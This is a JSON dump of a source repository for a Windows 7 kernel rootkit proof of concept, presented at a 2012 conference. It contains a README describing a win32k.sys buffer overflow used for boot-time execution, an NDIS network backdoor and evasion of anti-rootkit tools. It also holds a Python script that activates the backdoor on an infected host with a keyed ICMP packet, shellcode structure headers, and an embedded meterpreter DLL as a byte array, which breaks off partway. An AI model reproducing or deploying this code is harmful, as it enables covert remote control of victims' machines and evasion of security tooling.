[ { "path": "README.md", "content": "\r\n******************************************************************************\r\n\r\n Kernel rootkit, that lives inside the Windows registry value data. \r\n By Oleksiuk Dmytro (aka Cr4sh) \r\n \r\n http://twitter.com/d_olex \r\n http://blog.cr4.sh \r\n cr4sh0@gmail.com \r\n\r\n******************************************************************************\r\n \r\nRootkit uses the zero day vulnerability in win32k.sys (buffer overflow in function win32k!bInitializeEUDC()) to get the execution at the OS startup.\r\n \r\nFeatures:\r\n \r\n * NDIS-based network backdoor (+ meterpreter/bind_tcp).\r\n \r\n * In order to avoid unknown executable code detection it moves itself in the memory over discardable sections of some default Windows drivers.\r\n \r\n * Completely undetectable by public anti-rootkit tools.\r\n \r\n * Working on Windows 7 (SP0, SP1) x86.\r\n\r\n\r\n ![diagram](https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/WindowsRegistryRootkit-execution.png)\r\n\r\n \r\nThis rootkit was originally presented at the ZeroNights 2012 conference during my talk. \r\nSee the slides and videos for more information: https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/Applied-anti-forensics.pdf\r\n" }, { "path": "bin/rootkit_ping.py", "content": "#####################################################################\r\n#\r\n# Windows kernrel rootkit PoC using registry values processing BoF.\r\n#\r\n# Script for meterpreter/bind_tcp backdoor activation on TCP/4444 \r\n# port of infected target.\r\n# \r\n# (c) 2012, Oleksiuk Dmytro (aka Cr4sh)\r\n# cr4sh@riseup.net\r\n#\r\n#####################################################################\r\n\r\nimport sys, os\r\nfrom optparse import OptionParser\r\n\r\nBACKDOOR_PORT_NUMBER = 4444\r\nTIMEOUT = 5\r\n\r\ntry:\r\n\r\n # import scapy stuff\r\n from scapy.all import *\r\n\r\nexcept Exception, why:\r\n\r\n print \"[!] Exception while importing module: \" + str(why)\r\n print \"[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?\"\r\n sys.exit()\r\n\r\nif __name__ == '__main__':\r\n\r\n print \"***********************************************************\\n\"\r\n print \" Windows kernrel rootkit PoC using registry values processing BoF.\\n\"\r\n print \" (c) 2012 Oleksiuk Dmytro (aka Cr4sh)\"\r\n print \" cr4sh@riseup.net\\n\"\r\n print \"***********************************************************\\n\"\r\n\r\n parser = OptionParser()\r\n\r\n parser.add_option(\"-k\", \"--key\", dest = \"key\", default = None,\r\n help = \"Rootkit secret key.\")\r\n\r\n parser.add_option(\"-d\", \"--dst\", dest = \"dst\", default = None,\r\n help = \"Destination host IP address.\")\r\n\r\n # parse command line\r\n (options, args) = parser.parse_args()\r\n\r\n if options.key is None or options.dst is None:\r\n\r\n print \"[!] Please specify --dst and --key options\"\r\n sys.exit()\r\n\r\n print \"[+] Destination host IP address: \", options.dst\r\n print \"[+] Rootkit secret key: \", options.key\r\n print \"[+] Backdoor port: \", str(BACKDOOR_PORT_NUMBER)\r\n\r\n # allocate IP + ICMP packets\r\n ip = IP(dst = options.dst)\r\n icmp = ICMP(type = 8, code = 0)\r\n data = \"RKCTL:\" + options.key\r\n\r\n # send it over the network\r\n sr1(ip/icmp/data, timeout = TIMEOUT) \r\n\r\n # scan for opened backdoor port\r\n ip = IP(dst = options.dst)\r\n TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40) \r\n \r\n # send SYN packet and wait for the first reply\r\n TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1) \r\n \r\n # SEQ Number for SYN-ACK\r\n if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12:\r\n\r\n # response from our target aka hostip - expect RST\r\n print \"[+] Port %d is closed\" % BACKDOOR_PORT_NUMBER\r\n \r\n else:\r\n \r\n print \"[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp\" % BACKDOOR_PORT_NUMBER\r\n print \"[+] It will be closed immediately after 'exit' command in meterpreter shell\"\r\n\r\n# if end\r\n\r\n#\r\n# EoF\r\n#\r\n" }, { "path": "src/common/catchy32.h", "content": "#define\tCATCHY_ERROR\t0xffffffff\r\n\r\n#ifdef __cplusplus\r\nextern \"C\" {\r\n#endif\r\n\tULONG __cdecl c_Catchy(PVOID);\r\n#ifdef __cplusplus\r\n}\r\n#endif\r\n" }, { "path": "src/common/common.h", "content": "\r\n#define TIME_ABSOLUTE(wait) (wait)\r\n#define TIME_RELATIVE(wait) (-(wait))\r\n#define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)\r\n#define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L))\r\n#define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L))\r\n#define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L))\r\n\r\n#define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_))\r\n\r\n#define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1))\r\n#define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_))\r\n\r\n#define IFMT32 \"0x%.8x\"\r\n#define IFMT64 \"0x%.16I64x\"\r\n\r\n\r\n#define GET_NATIVE(_name_) \\\r\n \\\r\n func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress( \\\r\n GetModuleHandle(\"ntdll.dll\"), \\\r\n (#_name_) \\\r\n );\r\n\r\n#if defined(_X86_)\r\n\r\n#define IFMT IFMT32\r\n\r\n#elif defined(_AMD64_)\r\n\r\n#define IFMT IFMT64\r\n\r\n#endif\r\n" }, { "path": "src/common/debug.cpp", "content": "#include \"stdafx.h\"\r\n//--------------------------------------------------------------------------------------\r\n#ifdef DBG\r\n//--------------------------------------------------------------------------------------\r\nchar *GetNameFromFullPath(char *lpszPath)\r\n{\r\n char *lpszName = lpszPath;\r\n\r\n for (int i = 0; i < lstrlenA(lpszPath); i++)\r\n {\r\n if (lpszPath[i] == '\\\\' || lpszPath[i] == '/')\r\n {\r\n lpszName = lpszPath + i + 1;\r\n }\r\n }\r\n\r\n return lpszName;\r\n}\r\n//--------------------------------------------------------------------------------------\r\ntypedef int (__cdecl * func_sprintf)(LPSTR, LPCSTR, ...);\r\ntypedef int (__cdecl * func_vsprintf)(LPSTR, LPCSTR, va_list arglist);\r\ntypedef int (__cdecl * func__vscprintf)(const char *format, va_list argptr);\r\n\r\nvoid DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...)\r\n{\r\n va_list mylist;\r\n va_start(mylist, lpszMsg);\r\n\r\n func_sprintf f_sprintf = (func_sprintf)GetProcAddress(\r\n LoadLibraryA(\"msvcrt.dll\"),\r\n \"sprintf\"\r\n );\r\n if (f_sprintf == NULL)\r\n {\r\n return;\r\n }\r\n\r\n func_vsprintf f_vsprintf = (func_vsprintf)GetProcAddress(\r\n LoadLibraryA(\"msvcrt.dll\"),\r\n \"vsprintf\"\r\n );\r\n if (f_vsprintf == NULL)\r\n {\r\n return;\r\n }\r\n\r\n func__vscprintf f__vscprintf = (func__vscprintf)GetProcAddress(\r\n LoadLibraryA(\"msvcrt.dll\"),\r\n \"_vscprintf\"\r\n );\r\n if (f__vscprintf == NULL)\r\n {\r\n return;\r\n }\r\n\r\n size_t len = f__vscprintf(lpszMsg, mylist) + 0x100;\r\n\r\n char *lpszBuff = (char *)LocalAlloc(LMEM_FIXED, len);\r\n if (lpszBuff == NULL)\r\n {\r\n va_end(mylist);\r\n return;\r\n }\r\n\r\n char *lpszOutBuff = (char *)LocalAlloc(LMEM_FIXED, len);\r\n if (lpszOutBuff == NULL)\r\n {\r\n LocalFree(lpszBuff);\r\n va_end(mylist);\r\n return;\r\n }\r\n\r\n f_vsprintf(lpszBuff, lpszMsg, mylist);\t\r\n va_end(mylist);\r\n\r\n f_sprintf(\r\n lpszOutBuff, \"[%.5d] .\\\\%s(%d) : %s\", \r\n GetCurrentProcessId(), GetNameFromFullPath(lpszFile), Line, lpszBuff\r\n );\r\n\r\n OutputDebugStringA(lpszOutBuff);\r\n\r\n HANDLE hStd = GetStdHandle(STD_OUTPUT_HANDLE);\r\n if (hStd != INVALID_HANDLE_VALUE)\r\n {\r\n DWORD dwWritten = 0;\r\n WriteFile(hStd, lpszBuff, lstrlenA(lpszBuff), &dwWritten, NULL); \r\n }\r\n\r\n LocalFree(lpszOutBuff);\r\n LocalFree(lpszBuff);\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#endif DBG\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/common/debug.h", "content": "#ifdef DBG\r\n\r\nvoid DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...);\r\n\r\n#else\r\n\r\n#define DbgMsg\r\n\r\n#endif\r\n" }, { "path": "src/common/ntdll_defs.h", "content": "typedef LONG NTSTATUS; \r\n\r\ntypedef struct _IO_STATUS_BLOCK \r\n{\r\n union {\r\n NTSTATUS Status;\r\n PVOID Pointer;\r\n };\r\n ULONG_PTR Information;\r\n\r\n} IO_STATUS_BLOCK, \r\n*PIO_STATUS_BLOCK;\r\n\r\n#undef UNICODE_STRING\r\n\r\ntypedef struct _UNICODE_STRING \r\n{\r\n USHORT Length;\r\n USHORT MaximumLength;\r\n PWSTR Buffer;\r\n\r\n} UNICODE_STRING, \r\n*PUNICODE_STRING;\r\n\r\ntypedef struct _STRING \r\n{\r\n USHORT Length;\r\n USHORT MaximumLength;\r\n PCHAR Buffer;\r\n \r\n} ANSI_STRING, \r\n*PANSI_STRING;\r\n\r\ntypedef struct _CLIENT_ID \r\n{\r\n HANDLE UniqueProcess;\r\n HANDLE UniqueThread;\r\n\r\n} CLIENT_ID,\r\n*PCLIENT_ID;\r\n\r\n#define OBJ_INHERIT 0x00000002\r\n#define OBJ_PERMANENT 0x00000010\r\n#define OBJ_EXCLUSIVE 0x00000020\r\n#define OBJ_CASE_INSENSITIVE 0x00000040\r\n#define OBJ_OPENIF 0x00000080\r\n#define OBJ_OPENLINK 0x00000100\r\n#define OBJ_VALID_ATTRIBUTES 0x000001F2\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n ULONG Length;\r\n HANDLE RootDirectory;\r\n PUNICODE_STRING ObjectName;\r\n ULONG Attributes;\r\n PVOID SecurityDescriptor;\r\n PVOID SecurityQualityOfService;\r\n\r\n} OBJECT_ATTRIBUTES, \r\n*POBJECT_ATTRIBUTES;\r\n\r\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\r\n (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \\\r\n (p)->RootDirectory = r; \\\r\n (p)->Attributes = a; \\\r\n (p)->ObjectName = n; \\\r\n (p)->SecurityDescriptor = s; \\\r\n (p)->SecurityQualityOfService = NULL; \\\r\n}\r\n\r\n#define NT_SUCCESS(Status) ((LONG)(Status) >= 0)\r\n#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)\r\n\r\n#define NtCurrentProcess() ((HANDLE)-1)\r\n\r\n#ifndef STATUS_BUFFER_OVERFLOW\r\n#define STATUS_BUFFER_OVERFLOW ((NTSTATUS)0x80000005L) \r\n#endif\r\n\r\n#ifndef STATUS_NO_MORE_FILES\r\n#define STATUS_NO_MORE_FILES ((NTSTATUS)0x80000006L)\r\n#endif\r\n\r\n#ifndef STATUS_INFO_LENGTH_MISMATCH\r\n#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)\r\n#endif\r\n\r\n#ifndef STATUS_BUFFER_TOO_SMALL \r\n#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)\r\n#endif\r\n\r\n#ifndef STATUS_UNSUCCESSFUL\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#endif\r\n" }, { "path": "src/common/shellcode2_struct.h", "content": "\r\n#define DBGPRINT_MESSAGE \"YOU GOT PWND!\\n\"\r\n#define DBGPRINT_MESSAGE_LEN 0x20\r\n\r\ntypedef struct _SC_PARAMS\r\n{\r\n PVOID kernel_base;\r\n PVOID win32k_base;\r\n\r\n ULONG rootkit_size;\r\n PVOID rootkit_base;\r\n\r\n ULONG offset_MmIsAddressValid;\r\n ULONG offset_PsGetCurrentProcess;\r\n ULONG offset_PsGetProcessWin32Process;\r\n ULONG offset_ExAllocatePool;\r\n ULONG offset_RtlQueryRegistryValues;\r\n ULONG offset_UserInitialize;\r\n ULONG offset_bInitializeEUDC_patch;\r\n\r\n#ifdef USE_SHELLCODE_DBGPRINT\r\n\r\n ULONG offset_DbgPrint;\r\n char szDbgPrintMessage[DBGPRINT_MESSAGE_LEN];\r\n\r\n#endif\r\n\r\n} SC_PARAMS,\r\n*PSC_PARAMS;\r\n\r\n/**\r\n * Offsets for SC_PARAMS fields.\r\n */\r\n#define _kernel_base 0x00\r\n#define _win32k_base 0x04\r\n#define _rootkit_size 0x08\r\n#define _rootkit_base 0x0c\r\n\r\n#define _MmIsAddressValid 0x10\r\n#define _PsGetCurrentProcess 0x14\r\n#define _PsGetProcessWin32Process 0x18\r\n#define _ExAllocatePool 0x1c\r\n\r\n#define _RtlQueryRegistryValues 0x20\r\n#define _UserInitialize 0x24\r\n#define _bInitializeEUDC_patch 0x28\r\n#define _DbgPrint 0x2c\r\n\r\n#define _szDbgPrintMessage 0x30\r\n\r\n#define SHELLCODE_2_MAX_BUFF_SIZE 0x300\r\n" }, { "path": "src/common/undocnt.h", "content": "\r\n/************************************************************/\r\n/* */ \r\n/* Some structures for native API functions */\r\n/* */\r\n/************************************************************/\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS \r\n{\r\n SystemBasicInformation,\r\n SystemProcessorInformation, // obsolete...delete\r\n SystemPerformanceInformation,\r\n SystemTimeOfDayInformation,\r\n SystemPathInformation,\r\n SystemProcessInformation,\r\n SystemCallCountInformation,\r\n SystemDeviceInformation,\r\n SystemProcessorPerformanceInformation,\r\n SystemFlagsInformation,\r\n SystemCallTimeInformation,\r\n SystemModuleInformation,\r\n SystemLocksInformation,\r\n SystemStackTraceInformation,\r\n SystemPagedPoolInformation,\r\n SystemNonPagedPoolInformation,\r\n SystemHandleInformation,\r\n SystemObjectInformation,\r\n SystemPageFileInformation,\r\n SystemVdmInstemulInformation,\r\n SystemVdmBopInformation,\r\n SystemFileCacheInformation,\r\n SystemPoolTagInformation,\r\n SystemInterruptInformation,\r\n SystemDpcBehaviorInformation,\r\n SystemFullMemoryInformation,\r\n SystemLoadGdiDriverInformation,\r\n SystemUnloadGdiDriverInformation,\r\n SystemTimeAdjustmentInformation,\r\n SystemSummaryMemoryInformation,\r\n SystemMirrorMemoryInformation,\r\n SystemPerformanceTraceInformation,\r\n SystemObsolete0,\r\n SystemExceptionInformation,\r\n SystemCrashDumpStateInformation,\r\n SystemKernelDebuggerInformation,\r\n SystemContextSwitchInformation,\r\n SystemRegistryQuotaInformation,\r\n SystemExtendServiceTableInformation,\r\n SystemPrioritySeperation,\r\n SystemVerifierAddDriverInformation,\r\n SystemVerifierRemoveDriverInformation,\r\n SystemProcessorIdleInformation,\r\n SystemLegacyDriverInformation,\r\n SystemCurrentTimeZoneInformation,\r\n SystemLookasideInformation,\r\n SystemTimeSlipNotification,\r\n SystemSessionCreate,\r\n SystemSessionDetach,\r\n SystemSessionInformation,\r\n SystemRangeStartInformation,\r\n SystemVerifierInformation,\r\n SystemVerifierThunkExtend,\r\n SystemSessionProcessInformation,\r\n SystemLoadGdiDriverInSystemSpace,\r\n SystemNumaProcessorMap,\r\n SystemPrefetcherInformation,\r\n SystemExtendedProcessInformation,\r\n SystemRecommendedSharedDataAlignment,\r\n SystemComPlusPackage,\r\n SystemNumaAvailableMemory,\r\n SystemProcessorPowerInformation,\r\n SystemEmulationBasicInformation,\r\n SystemEmulationProcessorInformation,\r\n SystemExtendedHandleInformation,\r\n SystemLostDelayedWriteInformation,\r\n SystemBigPoolInformation,\r\n SystemSessionPoolTagInformation,\r\n SystemSessionMappedViewInformation,\r\n SystemHotpatchInformation,\r\n SystemObjectSecurityMode,\r\n SystemWatchdogTimerHandler,\r\n SystemWatchdogTimerInformation,\r\n SystemLogicalProcessorInformation,\r\n SystemWow64SharedInformation,\r\n SystemRegisterFirmwareTableInformationHandler,\r\n SystemFirmwareTableInformation,\r\n SystemModuleInformationEx,\r\n SystemVerifierTriageInformation,\r\n SystemSuperfetchInformation,\r\n SystemMemoryListInformation,\r\n SystemFileCacheInformationEx,\r\n MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum\r\n\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION \r\n{\r\n HANDLE Section; // Not filled in\r\n PVOID MappedBase;\r\n PVOID ImageBase;\r\n ULONG ImageSize;\r\n ULONG Flags;\r\n USHORT LoadOrderIndex;\r\n USHORT InitOrderIndex;\r\n USHORT LoadCount;\r\n USHORT OffsetToFileName;\r\n UCHAR FullPathName[ 256 ];\r\n\r\n} RTL_PROCESS_MODULE_INFORMATION, \r\n*PRTL_PROCESS_MODULE_INFORMATION;\r\n\r\ntypedef struct _RTL_PROCESS_MODULES \r\n{\r\n ULONG NumberOfModules;\r\n RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];\r\n\r\n} RTL_PROCESS_MODULES, \r\n*PRTL_PROCESS_MODULES;\r\n\r\ntypedef enum _SHUTDOWN_ACTION \r\n{\r\n ShutdownNoReboot,\r\n ShutdownReboot,\r\n ShutdownPowerOff\r\n\r\n} SHUTDOWN_ACTION, \r\n*PSHUTDOWN_ACTION;\r\n\r\ntypedef struct _DIRECTORY_BASIC_INFORMATION \r\n{\r\n UNICODE_STRING ObjectName;\r\n UNICODE_STRING ObjectTypeName;\r\n\r\n} DIRECTORY_BASIC_INFORMATION, \r\n*PDIRECTORY_BASIC_INFORMATION;\r\n\r\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO \r\n{\r\n USHORT UniqueProcessId;\r\n USHORT CreatorBackTraceIndex;\r\n UCHAR ObjectTypeIndex;\r\n UCHAR HandleAttributes;\r\n USHORT HandleValue;\r\n PVOID Object;\r\n ULONG GrantedAccess;\r\n\r\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, \r\n*PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION \r\n{\r\n ULONG NumberOfHandles;\r\n SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ];\r\n\r\n} SYSTEM_HANDLE_INFORMATION, \r\n*PSYSTEM_HANDLE_INFORMATION;\r\n\r\n/************************************************************/\r\n/* */ \r\n/* Prototypes for native and kernel API functions */\r\n/* */\r\n/************************************************************/\r\n\r\ntypedef enum _KPROFILE_SOURCE \r\n{\r\n ProfileTime,\r\n ProfileAlignmentFixup,\r\n ProfileTotalIssues,\r\n ProfilePipelineDry,\r\n ProfileLoadInstructions,\r\n ProfilePipelineFrozen,\r\n ProfileBranchInstructions,\r\n ProfileTotalNonissues,\r\n ProfileDcacheMisses,\r\n ProfileIcacheMisses,\r\n ProfileCacheMisses,\r\n ProfileBranchMispredictions,\r\n ProfileStoreInstructions,\r\n ProfileFpInstructions,\r\n ProfileIntegerInstructions,\r\n Profile2Issue,\r\n Profile3Issue,\r\n Profile4Issue,\r\n ProfileSpecialInstructions,\r\n ProfileTotalCycles,\r\n ProfileIcacheIssues,\r\n ProfileDcacheAccesses,\r\n ProfileMemoryBarrierCycles,\r\n ProfileLoadLinkedIssues,\r\n ProfileMaximum\r\n\r\n} KPROFILE_SOURCE, \r\n*PKPROFILE_SOURCE;\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtQueryIntervalProfile)(\r\n KPROFILE_SOURCE ProfileSource,\r\n PULONG Interval\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtQuerySystemInformation)(\r\n SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n PVOID SystemInformation,\r\n ULONG SystemInformationLength,\r\n PULONG ReturnLength\r\n);\r\n\r\ntypedef CCHAR KPROCESSOR_MODE;\r\n\r\ntypedef enum _MODE \r\n{\r\n KernelMode,\r\n UserMode,\r\n MaximumMode\r\n\r\n} MODE;\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtAllocateVirtualMemory)(\r\n HANDLE ProcessHandle,\r\n PVOID *BaseAddress,\r\n ULONG_PTR ZeroBits,\r\n PSIZE_T RegionSize,\r\n ULONG AllocationType,\r\n ULONG Protect \r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_KeDelayExecutionThread)(\r\n KPROCESSOR_MODE WaitMode,\r\n BOOLEAN Alertable,\r\n PLARGE_INTEGER Interval\r\n);\r\n\r\ntypedef VOID (WINAPI * func_KeUnstackDetachProcess)(\r\n PVOID ApcState\r\n);\r\n\r\ntypedef enum _POOL_TYPE \r\n{\r\n NonPagedPool,\r\n PagedPool\r\n\r\n} POOL_TYPE;\r\n\r\ntypedef PVOID (WINAPI * func_ExAllocatePool)(\r\n POOL_TYPE PoolType, \r\n SIZE_T NumberOfBytes\r\n);\r\n\r\ntypedef HANDLE (WINAPI * func_PsGetCurrentProcessId)(VOID);\r\ntypedef HANDLE (WINAPI * func_PsGetCurrentThreadId)(VOID);\r\ntypedef PVOID (WINAPI * func_PsGetCurrentThread)(VOID);\r\n\r\ntypedef NTSTATUS (WINAPI * func_ZwOpenThread)(\r\n PHANDLE ThreadHandle,\r\n ACCESS_MASK DesiredAccess,\r\n POBJECT_ATTRIBUTES ObjectAttributes,\r\n PCLIENT_ID ClientId\r\n);\r\n\r\ntypedef VOID (WINAPI * func_RtlInitUnicodeString)(\r\n PUNICODE_STRING DestinationString,\r\n PCWSTR SourceString\r\n);\r\n\r\ntypedef VOID (WINAPI * func_RtlInitAnsiString)(\r\n PANSI_STRING DestinationString,\r\n PCSTR SourceString\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_RtlAnsiStringToUnicodeString)(\r\n PUNICODE_STRING DestinationString,\r\n PANSI_STRING SourceString,\r\n BOOLEAN AllocateDestinationString\r\n);\r\n\r\ntypedef BOOLEAN (WINAPI * func_RtlEqualUnicodeString)(\r\n UNICODE_STRING *String1,\r\n UNICODE_STRING *String2,\r\n BOOLEAN CaseInSensitive\r\n);\r\n\r\ntypedef VOID (WINAPI * func_RtlFreeUnicodeString)(\r\n PUNICODE_STRING UnicodeString\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtOpenFile)(\r\n PHANDLE FileHandle,\r\n ACCESS_MASK DesiredAccess,\r\n POBJECT_ATTRIBUTES ObjectAttributes,\r\n PIO_STATUS_BLOCK IoStatusBlock,\r\n ULONG ShareAccess,\r\n ULONG OpenOptions\r\n);\r\n\r\ntypedef VOID (__fastcall * func_IofCompleteRequest)(\r\n struct _IRP *Irp,\r\n CCHAR PriorityBoost\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_PsLookupProcessByProcessId)(\r\n HANDLE ProcessId,\r\n PVOID *Process\r\n);\r\n" }, { "path": "src/includes/meterpreter_debug.dll.h", "content": "// 5632 bytes readed form ..\\meterpreter_debug.dll...\r\nunsigned char dll[] =\r\n{\r\n0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,\r\n0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00,\r\n0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,\r\n0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,\r\n0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,\r\n0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,\r\n0x72,0x6c,0xba,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00,\r\n0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\r\n0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05,\r\n0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00,\r\n0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,\r\n0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00,\r\n0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,\r\n0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0,\r\n0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00,\r\n0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n